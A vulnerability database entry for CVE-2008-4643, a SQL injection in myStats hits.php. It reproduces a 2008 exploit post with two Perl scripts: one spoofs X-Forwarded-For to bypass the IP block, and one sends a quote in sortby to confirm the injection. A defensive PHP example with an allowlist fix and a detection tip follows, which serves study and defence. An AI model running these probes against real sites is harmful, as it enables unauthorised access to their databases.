myStats 'hits.php' sortby Parameter SQL Injection Vulnerability

Vulnerability ID: 1116414    Vulnerability type: SQL injection
Published: 2008-10-15    Updated: 2009-01-29
CVE ID: CVE-2008-4643    CNNVD ID: CNNVD-200810-344
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/6759
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-344
|Vulnerability Details
hits.php in myWebland myStats contains a SQL injection vulnerability: the value of the sortby parameter is concatenated unescaped into an ORDER BY clause, so a remote attacker can execute arbitrary SQL commands via the sortby parameter.
|Exploit
# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

---------------------
Break System Block IP
---------------------

<<hits.php>>

7:  if (@getenv("HTTP_X_FORWARDED_FOR"))
      { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); }
    else { $u_ip = @getenv("REMOTE_ADDR"); }

    if ($u_ip == BLOCK_IP)
      { return 1;
13:     exit; }

<<config.php>>

11: define("BLOCK_IP", "127.0.0.1");

<<exploit.pl>>

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

my $web = "http://localhost/hits.php";
my $ua  = LWP::UserAgent->new();
# hits.php trusts X-Forwarded-For over REMOTE_ADDR, so the block check
# only ever sees the value supplied in this header
$ua->default_header('X-Forwarded-For' => "127.1.1.1");
my $respuesta = HTTP::Request->new(GET => $web);
$ua->timeout(30);
my $response  = $ua->request($respuesta);
my $contenido = $response->content;
if ($response->is_success)
{
    open(my $fh, '>>', 'results.txt') or die "Cannot open results.txt: $!";
    print $fh "$contenido\n";
    close($fh);
    print "\n[+] Exploit Successful!\n\n";
}
else
{
    print "\n[-] Exploit Failed!\n\n";
}

<<proof of concept>>

$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP

-------------
SQL Injection
-------------

<<hits.php>>

63: if (isset($_GET['sortby']))
      { $sortby = $_GET['sortby']; }
    else
      { $sortby = 'timestamp'; }

    $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby . " DESC LIMIT 0, " . DISPLAY_LOG_NO;

69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());

<<exploit.pl>>

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

# a single quote in sortby reaches ORDER BY unescaped; the resulting
# MySQL syntax error is echoed back by the die() on line 69
my $web = "http://localhost/hits.php?sortby=1'";
my $ua  = LWP::UserAgent->new();
my $respuesta = HTTP::Request->new(GET => $web);
$ua->timeout(30);
my $response  = $ua->request($respuesta);
my $contenido = $response->content;
if ($response->is_success)
{
    if ($contenido =~ /You have an error in your SQL syntax;/)
    {
        print "\n[+] Exploit Successful!\n";
        print "\n[+] Content:\n";
        print "$contenido\n\n";
    }
}
else
{
    print "\n[-] Exploit Failed!\n\n";
}

# milw0rm.com [2008-10-15]
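Both issues above have the same root cause: hits.php trusts request-controlled input (the X-Forwarded-For header and the sortby parameter) without validation. The following is an added example, not myStats' own code, showing how the two checks would be written defensively. Column names cannot be bound as prepared-statement parameters, so the sort column is restricted to an allowlist; X-Forwarded-For is honoured only when the request arrived from a proxy you operate. The constants LOG_TBL, DISPLAY_LOG_NO, BLOCK_IP and TRUSTED_PROXY, and the column names in SORTABLE_COLUMNS, are assumptions standing in for config.php values.

```php
<?php
// Added example (not part of myStats). All constants below are assumed values.
define('LOG_TBL', 'mystats_log');
define('DISPLAY_LOG_NO', 50);
define('BLOCK_IP', '127.0.0.1');
define('TRUSTED_PROXY', '10.0.0.2');   // assumed address of the reverse proxy, if any

// Only these column names may reach ORDER BY (assumed column set).
const SORTABLE_COLUMNS = ['timestamp', 'ip', 'page', 'referer'];

// Return the requested sort column if it is on the allowlist, otherwise the default.
function sortColumn(array $get): string
{
    $requested = $get['sortby'] ?? 'timestamp';
    if (is_string($requested) && in_array($requested, SORTABLE_COLUMNS, true)) {
        return $requested;
    }
    return 'timestamp';
}

// Build the log query; the only interpolated pieces are an allowlisted
// identifier and an integer-cast limit, so no attacker bytes reach the SQL.
function buildLogQuery(array $get): string
{
    $col = sortColumn($get);
    return 'SELECT * FROM `' . LOG_TBL . '` ORDER BY `' . $col
         . '` DESC LIMIT 0, ' . (int) DISPLAY_LOG_NO;
}

// Determine the client IP. X-Forwarded-For is client-controlled unless the
// connection came from TRUSTED_PROXY, and even then only the hop appended by
// that proxy (the last entry) can be trusted.
function clientIp(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if ($remote === TRUSTED_PROXY && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($hops);
        if (filter_var($candidate, FILTER_VALIDATE_IP)) {
            return $candidate;
        }
    }
    return $remote;
}

function isBlocked(array $server): bool
{
    return clientIp($server) === BLOCK_IP;
}

// Demonstration with constructed inputs mirroring the two requests in the PoC.
$spoofed = ['REMOTE_ADDR' => '127.0.0.1', 'HTTP_X_FORWARDED_FOR' => '127.1.1.1'];
var_dump(isBlocked($spoofed));                  // bool(true): header ignored, block still applies
echo buildLogQuery(['sortby' => "1'"]), "\n";   // falls back to timestamp; the quote never reaches SQL
echo buildLogQuery(['sortby' => 'ip']), "\n";   // allowlisted column is used
```

The allowlist is the important part of the fix: escaping functions such as mysql_real_escape_string() protect string literals, but sortby is used as an identifier, where quoting does not apply, so validation against a fixed set of names is the only reliable control. For detection, a request log entry whose sortby value is not one of the allowlisted names is a direct indicator of probing for this issue.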
|References

Source: XF
Name: mystats-hits-sql-injection(45917)
Link: http://xforce.iss.net/xforce/xfdb/45917
Source: BID
Name: 31772
Link: http://www.securityfocus.com/bid/31772
Source: MILW0RM
Name: 6759
Link: http://www.milw0rm.com/exploits/6759
Source: SREASON
Name: 4455
Link: http://securityreason.com/securityalert/4455
Source: SECUNIA
Name: 32289
Link: http://secunia.com/advisories/32289